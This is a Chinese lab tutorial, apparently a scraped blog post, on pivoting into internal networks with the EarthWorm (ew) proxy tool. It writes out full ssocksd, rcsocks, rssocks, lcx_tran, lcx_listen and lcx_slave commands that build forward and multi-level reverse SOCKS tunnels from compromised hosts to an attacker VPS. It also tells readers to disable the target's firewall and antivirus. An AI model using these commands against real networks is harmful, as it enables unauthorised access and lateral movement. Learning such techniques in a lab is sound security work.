【内网—内网转发】——代理转发_ew(Earthworm)代理转发

article/2025/9/26 13:28:04

文章目录

    • 一、环境准备:
    • 二、工具:
    • 三、概念:
    • 四、学习目的:
    • 五、ew(Earthworm)介绍:
    • 六、ew(Earthworm)使用说明:
    • 七、ew(Earthworm)正向代理(适用于被控服务器拥有一个公网IP):
      • 1. 场景:
      • 2. 网络拓扑图:
      • 3. 说明:
      • 4. 实验过程:
    • 八、ew(Earthworm)反向代理:
      • 1. 一级代理:
        • 1.1 场景:
        • 1.2 网络拓扑图:
        • 1.3 说明:
        • 1.4 实验过程:
      • 2. 二级代理(一):
        • 2.1 场景:
        • 2.2 网络拓扑图:
        • 2.3 说明:
        • 2.4 实验过程:
      • 3. 二级代理(二):
        • 3.1 场景:
        • 3.2 网络拓扑图:
        • 3.3 说明:
        • 3.4 实验过程:

一、环境准备:

  关闭靶机电脑的防火墙及病毒和威胁防护的实时防护。
  开启内网主机的远程桌面。

二、工具:

ew(Earthworm)内网穿透工具
proxifier代理工具客户端

三、概念:

  内网渗透不光只是反弹一个shell,反弹一个端口,我们更需要对内网进行更深一步的扫描和渗透,这时候就需要找到一个代理服务器,充当外网和内网数据转发的节点,通过这个被我们控制的服务器,把所在网段的流量转发到公网(互联网)。
  所以出现了反弹代理,也叫反弹socket。

四、学习目的:

  在我们进行渗透测试过程中,获得了目标服务器的getshell权限后,要对内网其它服务器或者主机进一步渗透;这样的话,需要对其他主机进行信息收集,端口、服务探测及漏洞扫描等操作。
  进行这样操作,只进行反弹shell和端口转发已经不能满足需求,需要进一步进行反弹代理,通过我们控制的目标服务器,把目标服务器作为代理服务器,充当外网和内网数据转发的节点,把所在内网网段的流量引出到公网,这样的话,就方便我们对目标服务器所在内网网段的其他主机进行探测及漏洞利用了。

五、ew(Earthworm)介绍:

  EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。
  该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。
  工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内。

六、ew(Earthworm)使用说明:

  该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)。

D:\ew>ew_for_Win.exe -h
版本:free1.2
./xxx ([-options] [values])*
选项 :
例如:./xxx -s ssocksd -h
-s   指定工作模式。工作模式支持如下:ssocksd , rcsocks , rssocks ,lcx_listen , lcx_tran , lcx_slavessocksd     创建正向socks代理服务端,监听在本地,直接把当前环境socks代理出去。rssocks     创建反向socks代理服务端rcsocks     反向socks代理客户端lcx_tran    正向tcp端口转发,监听在本地lcx_slave   反向tcp转发客户端lcx_listen  反向tcp服务端-l   listenport为服务器打开一个监听端口。
-d   refhost 设置反射主机地址。
-e   refport 设置反射端口。
-f   connhost 设置连接主机地址。
-g   connport 设置连接端口。
-h   help 显示帮助文本,通过添加 -s 参数,您还可以查看更详细的帮助。
-a   about 显示关于页面
-v   version 显示版本。
-t   usectime 设置超时的毫秒数。 默认的值为 1000 

可以参考:http://rootkiter.com/EarthWorm/

七、ew(Earthworm)正向代理(适用于被控服务器拥有一个公网IP):

1. 场景:

  目标网络边界服务器存在公网IP且可任意开监听端口。

角色系统网卡IP(网段)
攻击机windows10虚拟机NAT192.168.100.151
被控主机1windows08虚拟机NAT
VMnet1
192.168.100.158(公网IP)
172.16.10.10
内网主机windows03虚拟机VMnet1172.16.10.11

2. 网络拓扑图:

3. 说明:

  正向代理是服务器开放监听端口,客户端(攻击者)主动连接服务器的端口。
  适用于被控服务器拥有一个公网IP。

4. 实验过程:

1、在被控主机使用ew打开一个监听端口:
命令:

ew_for_Win.exe -s ssocksd -l 6666
-s          指定工作模式
ssocksd     创建正向socks代理服务端,监听在本地,直接把当前环境socks代理出去
-l          listenport为服务器打开一个监听端口


2、查看监听端口是否打开,可以看出监听端口已经打开:


3、使用proxifier代理工具客户端连接ew(Earthworm)的正向连接服务端:

在进行测试时可以出现无法连通的现象,这时需要在【被控主机1】的ew命令行里面敲一下回车键:

4、在攻击机上面连接被控服务器所在内网段的内网主机172.16.10.11:

八、ew(Earthworm)反向代理:

1. 一级代理:

1.1 场景:

  目标网络边界不存在公网IP,能够访问内网资源,可以访问公网,需要通过反弹方式创建 socks 代理。

角色系统网卡IP(网段)
攻击机windows10虚拟机NAT192.168.100.151
攻击者的公网vpswindows10虚拟机NAT192.168.100.152
被控主机1windows08虚拟机NAT
VMnet1
192.168.100.158
172.16.10.10
内网主机windows03虚拟机VMnet1172.16.10.11

1.2 网络拓扑图:

1.3 说明:

  反向代理是客户端开发端口,服务器连接客户端。
   适用于目标机器没有公网IP,但可访问内网资源。

1.4 实验过程:

1、在攻击者的公网vps上添加转接隧道,将6666收到的代理请求转交给反连8888端口的被控服务器:
命令:

ew_for_Win.exe -s rcsocks -l 6666 -e 8888
-s          指定工作模式
rcsocks     反向socks代理客户端
-l          listenport在代理客户端设置监听端口,将6666收到的 代理请求 转交给反连8888端口的被控服务器。
-e          refport设置反弹端口,用于接收被控服务器反弹过来的代理流量。

2、在被控服务器上启动SOCKS v5服务并反弹到公网vps主机的8888端口

命令:

ew_for_Win.exe -s rssocks -d 192.168.100.152 -e 8888
-s          指定工作模式
rssocks     创建反向socks代理服务端
-d          refhost设置反弹主机地址(IP)-e          refport设置反弹端口,反弹给公网vps开启的8888端口。

3、在公网vps出现以下界面,说明连接成功:

4、使用proxifier代理工具客户端连接公网vps上ew(Earthworm)的监听的端口:


在进行测试时可以出现无法连通的现象,这时需要在【攻击者的公网vps】的ew命令行里面敲一下回车键:

5、在攻击机上面连接被控服务器所在内网段的内网主机172.16.10.11:

2. 二级代理(一):

2.1 场景:

  在获得边界服务器【被控主机1】的webshell后,通过横向移动到内网环境1中的【被控主机2】,发现【被控主机2】同时处于另一个内网环境2中,但【被控主机2】所处的内网环境2无法访问公网,公网也无法访问【被控主机2】所在内网环境2 ,【被控主机2】却可以单向访问【被控主机1】,这时需要把【被控主机2】所在的内网环境2的流量代理出来。

角色系统网卡IP(网段)
攻击机windows10虚拟机NAT192.168.100.151
攻击者的公网vpswindows10虚拟机NAT192.168.100.152
被控主机1windows08虚拟机NAT
VMnet1
192.168.100.158
172.16.10.10
被控主机2windows08虚拟机VMnet1
VMnet2
172.16.10.11
10.1.1.1
内网主机windows03虚拟机VMnet1172.16.10.11

2.2 网络拓扑图:

2.3 说明:

  反向代理是客户端开发端口,服务器连接客户端。
   适用于目标机器没有公网IP,但可访问内网资源。

2.4 实验过程:

1、在公网vps添加转接隧道,将6666端口收到的代理请求流量转交给反连8888端口的被控主机:
命令:

ew_for_Win.exe -s rcsocks -l 6666 -e 8888
-s          指定工作模式
rcsocks     反向socks代理客户端
-l          listenport在代理客户端设置监听端口,将6666收到的 代理请求 转交给反连8888端口的被控服务器。
-e          refport设置反弹端口,用于接收被控服务器反弹过来的代理流量。

2、在被控服主机1上启动监听本机端口9999,并将9999端口接收到的代理流量,转发给攻击者的公网vps的8888端口:
命令:

ew_for_Win.exe -s lcx_tran -l 被控主机1本机端口 -f 攻击者的公网vps_IP -g 8888
ew_for_Win.exe -s lcx_tran -l 9999 -f 192.168.100.152 -g 8888
-s          指定工作模式
rssocks     创建反向socks代理服务端
-l          listenport在被控主机1上设置监听端口9999,将9999收到的 代理请求 转交给攻击者的公网vps的8888端口。
-f          connhost 设置连接主机地址(IP)-g          connport 设置连接端口。
这个命令的意思就是,把本机9999接收到的代理流量,转发到攻击者公网vps的192.168.100.1528888端口上。

3、在被控主机2启动SOCKS v5代理服务端,并反弹到被控主机1的8888端口 :

ew_for_Win.exe -s rssocks -d 172.16.10.10 -e 9999
-s          指定工作模式
rssocks     创建反向socks代理服务端
-d          refhost设置反弹主机地址(IP)-e          refport设置反弹端口,反弹给公网vps开启的8888端口。
这个命令的意思就是在被控主机2启动SOCKS v5代理服务端,把本机的代理流量反向代理到被控服务器19999端口。

4、使用proxifier代理工具客户端连接公网vps上ew(Earthworm)的监听的端口:

5、在攻击机上面连接第二级内网被控主机所在内网段的内网主机10.1.1.2:


3. 二级代理(二):

3.1 场景:

  在获得边界服务器【被控主机1】的webshell后,发现被控主机1没有公网IP,但处于边界的【被控主机1】可访问公网;攻击者通过横向移动到内网环境1中的【被控主机2】,发现【被控主机2】同时处于另一个内网环境2中,但【被控主机2】所处的内网环境2无法访问公网,公网也无法访问【被控主机2】所在内网环境2 ,但处于边界的【被控主机1】却可以单向访问【被控主机2】所处的内网环境2,这时需要把【被控主机2】所在的内网环境2的流量代理出来。

角色系统网卡IP(网段)
攻击机windows10虚拟机NAT192.168.100.151
攻击者的公网vpswindows10虚拟机NAT192.168.100.152
被控主机1windows08虚拟机NAT
VMnet1
192.168.100.158
172.16.10.10
被控主机2windows08虚拟机VMnet1
VMnet2
172.16.10.11
10.1.1.1
内网主机windows03虚拟机VMnet110.1.1.2

3.2 网络拓扑图:

3.3 说明:

  反向代理是客户端开发端口,服务器连接客户端。
   适用于目标机器没有公网IP,但可访问内网资源。

3.4 实验过程:

1、在攻击者的公网vps添加转接隧道,通过ew的lcx_listen模块监听本机的6666端口,把6666端口接受到的代理请求,转发到反连8888端口的主机:
命令:

ew_for_Win.exe -s lcx_listen -l 6666 -e 8888
-s          指定工作模式
lcx_listen  反向tcp服务端
-l          listenport在代理客户端设置监听端口,将6666收到的 代理请求 转交给反连8888端口的被控服务器。
-e          refport设置反弹端口,用于接收被控服务器反弹过来的代理流量。

2、在内网环境2中的【被控主机2】上通过ssocksd模块,开启正向代理服务,通过ssocksd模块监听【被控主机2】本机的9999端口,通过正向代理,把外流量引向内网:
命令:

ew_for_Win.exe -s ssocksd -l 9999
-s          指定工作模式
ssocksd     创建正向socks代理服务端,监听在本地,直接把当前环境socks代理出去
-l          listenport为服务器打开一个监听端口

3、在内网环境1中的被控主机1运行以下命令,通过ew的lcx_slave流量转发模块,将正向连接到攻击者的公网vps的8888端口,而获得的代理请求流量,转发给内网环境2的【被控主机2】,从而获得内网环境2的内网流量:

ew_for_Win.exe -s lcx_slave -d 攻击者的公网vps_IP -e 8888 -f 处于2级内网的被控主机 -g 9999
ew_for_Win.exe -s lcx_slave -d 192.168.100.152 -e 8888 -f 172.16.10.11 -g 9999
-s          指定工作模式
lcx_slave   反向tcp转发客户端
-d          refhost设置反弹主机地址(IP)-e          refport设置反弹端口,反弹给公网vps开启的8888端口
-f          connhost 设置连接主机地址
-g          connport 设置连接端口

4、使用proxifier代理工具客户端连接公网vps上ew(Earthworm)的监听的端口:

5、在攻击机上面连接第二级内网被控主机所在内网段的内网主机10.1.1.2:


http://chatgpt.dhexx.cn/article/32hiJgVJ.shtml

相关文章

苹果xsmax是什么接口_为什么苹果PD快充线头是银色而非金黄色?原来那根本就不是镀的银...

苹果开放第三方授权后,目前市面上已有不少苹果MFi认证的PD快充线,1小时就能充满iPhone X。苹果PD数据线,即USB-C to Lighting数据线,是苹果自家定义的一套数据线规范,一端为Type-C接口,另一端为苹果Lightin…

PD诱骗方案

方案1 如果在小制作中使用pd诱骗,可以参考国产方案 一个网友的设计 芯片手册提供的原理图如下 原理图1 原理图2 原理图3 原理图4 如果在一些小制作中使用还是比较方便的。 方案2 上面方案缺点仅支持PD2.0,不具有PPS,用于一些简单应用还是…

USB-PD 协议解析 - 简单易懂协议详解

目录 1. 简介 2. USB PD3.0 通信流程 2.1 发送数据包 2.2 接收数据包 2.3 双相标记编码(BMC) 2.4 符号编码(4B5B) 3. 数据包格式 3.1 前导码(Preamble) 3.2 SOP*(Start of Packet Sequence) 3.3 …

雷达干扰技术(一)PD雷达的特征

文章目录 1 多普勒频率2 PD雷达基本原理和组成3 PD雷达的信号特征 1 多普勒频率 雷达使用多普勒频率来提取目标的径向速度(距离变化率),以及区分运动和静止目标与物体,例如杂波。 多普勒现象描述了由于目标相对于辐射源的运动而…

详解PD3.0协议

通过65W充电头,给电池充电,中间有个充电芯片CCG3PA,电池可充可放,也就是PD的Power role可以是Source也可以是Sink。 在充电时的PD协议中的Device Discovery,通过SOP_Prime类型的消息进行交互,5个VDO包含了必要信息。其中cable VDO会告知自己是3A还是5A的线,不同的线能承…

PD-1和PD-L1到底是什么?

PD-1全称程序性死亡受体1,英文名字为Programmed Death 1,是一种重要的免疫抑制分子,为CD28超家族成员。以PD-1为靶点的免疫调节在抗肿瘤、抗感染、抗自身免疫性疾病及器官移植存活等方面均有重要的意义。其配体PD-L1也可作为靶点,…

药物相关 PK(药代动力) 、PD(药效)指标知识

1、PK(药代动力) Pharmacokinetic PK(Pharmacokinetics)主要研究药物在体内的吸收、分布、代谢和排泄过程,主要包括药物的药代动力学参数,如清除率、半衰期、分布容积等 PK代表药物的药代动力学&#xff…

pd.melt

一、函数 pd.melt( [frame, id_varsNone, value_varsNone, var_nameNone, "value_namevalue", col_levelNone] 参考官方文档 melt: V (使)熔化,融化 pd.melt将多列数据进行融合。 二、参数 id_vars: tuple, list, or ndarray, optional 用作标识符的列…

一文读懂USB3.1、USB Type-C、USB PD到底是什么?

USB3.1、USB Type-C、USB PD这几个英文单词应该是目前与USB接口相关的较热门的英文单词,大家或多或少都会在有意或者无意下接触到与其相关的一些信息,但是相对于大部分人来说也仅仅是知道有这么一个东东,但是对其功能及用途却并不了解&#x…

USB-PD 协议

USB-PD(Power Delivery)是基于USB Type-C的一种电源供电标准,最大供电功率可达100瓦(W);随着USB Type-C的普及,越来越多的设备(手机、平板、显示器、工作站、充电器等)使…

PD功能介绍

PD(Placement Driver),集成了ETCD, ETCD的Raft保证了数据的一致性; PD作用 整个集群TiKV元数据的存储分配全局ID和事物ID生成全局时钟TSO-事物开始时间、提交时间等搜集集群信息进行调度搜集Label功能支持高可用提供TiDB Dashboard功能 TSO physical …

python中pd是什么意思_python pd

广告关闭 腾讯云11.11云上盛惠 ,精选热门产品助力上云,云服务器首年88元起,买的越多返的越多,最高返5000元! 这里我们的目的是通过智能过滤器来减少查询cpu时间我想要通过其他数据框列名来过滤pd.read_sql中的列可能吗? 第1步:df1数据帧age1和age3是我未来的pd.read_s…

OBS多路推流插件使用方法(超级详细,亲测可用)

前提:OBS版本需要高于25.0 一、下载地址: https://download.csdn.net/download/longgeaisisi/12597711 二、下载后解压内含文件如下: 三、把这两个文件复制到你OBS安装目录下,覆盖: 四、重启OBS软件,这时…

视频直播推流与拉流的实现

序言 最近在研究直播的弹幕,东西有点多,准备记录一下免得自​​己忘了又要重新研究,也帮助有这方面需要的同学少走点弯路。关于直播的技术细节其实就是两个方面一个是推流一个是拉流,而弹幕的实现核心在即时聊天,使用聊…

直播推流优化|音视频开发

直播推流端是整个直播内容的生产源头。我们熟知的推流工具有:PC 推流工具 OBS、手持设备和各个直播平台的手机推流 App、针对一些复杂场景有更专业的导播台硬件等等。虽然工具众多,但推流端的整个工作流程还是比较固定的: 摄像头、麦克风采集…

OBS推流工具介绍及桌面录屏推流功能实现

OBS推流工具介绍及桌面录屏推流功能实现 文章目录 OBS推流工具介绍及桌面录屏推流功能实现1 OBS工具介绍2 OBS工具安装及简单使用2.1 安装步骤2.2 简单使用介绍 3 OBS实现桌面录屏推流工具实现4 总结 流媒体开发工程中,我们除了使用ffmpeg等工具辅助调试外&#xff…

RTMP推流方案总结

由于项目需要 RTMP 推送 H264 数据,在网上查找了下相关的方案,总结一下。 RTMP协议简介 在总结之前,我们先简单介绍一下 RTMP 协议。 RTMP(Real Time Messaging Protocol) 实时消息传送协议是 Adobe Systems 公司为 Flash 播放器和服务器之间…

推流工具 OBS 使用指南

推流工具 OBS 使用指南 内容转载阿里云文档–第三方推流工具使用指南 OBS介绍 什么是OBS? Open Broadcaster Software 是一款好用的直播流媒体内容制作软件。 OBS使用是否收费? 不收费,这个程序和它的源代码都是免费的。 OBS都支持哪些…

rtmp推流和拉流

提前说明,文章所用主要摘自网络,本文只是整合。鉴于来源太多,不进行引用说明 NGINX 安装nginx及安装nginx模块 nginx下载地址 http://nginx.org/download/nginx-1.20.1.tar.gz nginx-rtmp模块 组件下载地址 https://github.91chifun.w…

使用软件实现直播推流

rtmp媒体服务器:这里使用srs :https://github.com/ossrs/srs 首先clone到本地,进入到trunk目录: git clone https://github.com/ossrs/srs.git cd srs/trunk ./configure 最后执行:make 执行成功后,就…